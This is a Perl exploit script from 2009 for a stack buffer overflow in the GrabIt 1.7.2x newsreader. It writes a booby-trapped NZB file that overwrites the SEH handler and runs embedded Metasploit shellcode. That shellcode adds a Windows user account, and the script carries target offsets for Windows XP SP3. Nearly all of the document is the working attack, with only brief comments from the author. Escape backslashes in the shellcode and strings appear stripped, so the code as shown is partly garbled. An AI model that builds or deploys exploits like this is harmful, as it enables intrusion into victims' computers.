#!/usr/bin/perl
# theroadoutsidemyhouseispavedwithgoodintentions.pl
# AKA
# GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit
# BY
# Jeremy Brown [0xjbrown41@gmail.com] 05.07.2009
# ***********************************************************************************************************
# It seems I couldn't gather my resources quickly enough before the first exploit came out.. and it came as
# no surprise that it was a disappointment like so many others out there. I personally used to use this
# newsgroup program all the time, usenet is a nice service :) GrabIt is great-- Kudos to Shemes for sure.
# ***********************************************************************************************************
# After reading the advisory then debugging, I found the bug is a fairly standard hit and run stack overflow..
# we can overwrite SEH like a dream, so sadly this one may turn into malware rather quickly.. uh oh. Advice
# at the moment shall be.. update GrabIt quickly, like right now!
# ***********************************************************************************************************
#                libeay32.dll
#
# 1001A384   5B               POP EBX
# 1001A385   5D               POP EBP
# 1001A386   C3               RETN
#
# This exploit has been successfully tested in the following environments...
#
# Windows XP Home SP3 -> GrabIt 1.7.2b3 (GrabIt172b3.exe)
#                        GrabIt 1.7.2b2 (GrabIt172b2.exe)
#                        GrabIt 1.7.2b  (GrabIt172b.exe)
#
# Windows XP Pro SP3  -> GrabIt 1.7.2b3 (GrabIt172b3.exe)
#                        GrabIt 1.7.2b2 (GrabIt172b2.exe)
#                        GrabIt 1.7.2b  (GrabIt172b.exe)
#
# ***********************************************************************************************************
# BRONBRONGOTMVP: The Houston and LA series is heating up! I got the Lakers in 6 :D
# ***********************************************************************************************************
# theroadoutsidemyhouseispavedwithgoodintentions.pl

$nextsehh = 0x909006EB; # jmp 6
$sehh     = 0x1001A384; # pop, pop, ret @ libeay32.dll

# win32_adduser -  PASS=face EXITFUNC=process USER=smiley Size=236 Encoder=PexFnstenvSub http://metasploit.com
$sc = "x31xc9x83xe9xcbxd9xeexd9x74x24xf4x5bx81x73x13xe8".
      "x5bxc1xe6x83xebxfcxe2xf4x14xb3x85xe6xe8x5bx4axa3".
      "xd4xd0xbdxe3x90x5ax2ex6dxa7x43x4axb9xc8x5ax2axaf".
      "x63x6fx4axe7x06x6ax01x7fx44xdfx01x92xefx9ax0bxeb".
      "xe9x99x2ax12xd3x0fxe5xe2x9dxbex4axb9xccx5ax2ax80".
      "x63x57x8ax6dxb7x47xc0x0dx63x47x4axe7x03xd2x9dxc2".
      "xecx98xf0x26x8cxd0x81xd6x6dx9bxb9xeax63x1bxcdx6d".
      "x98x47x6cx6dx80x53x2axefx63xdbx71xe6xe8x5bx4ax8e".
      "xd4x04xf0x10x88x0dx48x1ex6bx9bxbaxb6x80x25x19x04".
      "x9bx33x59x18x62x55x96x19x0fx38xacx82xc6x3exb9x83".
      "xc8x74xa2xc6x86x3exb5xc6x9dx28xa4x94xc8x28xacx8f".
      "x84x3exb8xc6x8ex3axa2x83xc8x74x80xa2xacx7bxe7xc0".
      "xc8x35xa4x92xc8x37xaex85x89x37xa6x94x87x2exb1xc6".
      "xa9x3fxacx8fx86x32xb2x92x9ax3axb5x89x9ax28xe1x95".
      "x85x32xadx83x91x7bxeexa7xacx1fxc1xe6";

$filename = $ARGV[0];
$target   = $ARGV[1];

     print "n            GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit";
     print "n                     Jeremy Brown [0xjbrown41@gmail.com]n";

if((!defined($filename) || !defined($target)))
{

     print "nUsage: $0 pwn.nzb <target>n";
     print "nTargets: [1] Windows XP Homen         [2] Windows XP Pronn";
     exit;

}

$nextseh = pack('l', $nextsehh);
$seh     = pack('l', $sehh);
$nop     = "x90";

$nzb1 = "<?xml version="1.0" encoding="utf-8" ?>n";
$nzb2 = "<!DOCTYPE nzb PUBLIC "YOUKNOWTHEWORDS,SOSINGALONGFORMEBABY" "";

# Lets get nice and comfortable
if($target == "1") { $payload = $nzb1 . $nzb2 . $nop x 248 . $nextseh . $seh . $nop x 32 . $sc . "">"; }
if($target == "2") { $payload = $nzb1 . $nzb2 . $nop x 251 . $nextseh . $seh . $nop x 32 . $sc . "">"; }

     open(FILE, ">", $filename) or die("nError: Can't write to $filename! Exploit stopped");
     print FILE $payload;
     close(FILE);

     print "nExploit NZB "$filename" successfully created.nn";
     exit;

# www.Syue.com [2009-05-07]